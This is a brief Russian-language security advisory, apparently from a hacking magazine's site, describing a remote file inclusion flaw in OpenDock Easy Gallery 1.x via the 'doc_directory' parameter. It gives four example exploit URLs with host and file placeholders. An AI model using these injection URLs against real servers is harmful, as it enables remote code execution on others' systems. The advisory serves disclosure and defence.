Рекомендуем почитать:
Хакер #309. Самооборона по-хакерски
Программа: OpenDock Easy Gallery 1.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в обработке входных данных в параметре "doc_directory" различными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на уязвимой системе с привилегиями веб-сервера.
Успешное эксплуатирование уязвимости требует включение опции
"register_globals".
Примеры:
http://[host]/sw/lib_up_file/file.php?doc_directory=[file]
http://[host]/sw/lib_comment/comment.php?doc_directory=[file]
http://[host]/sw/lib_session/session.php?doc_directory=[file]
http://[host]/sw/lib_user/user.php?doc_directory=[file]
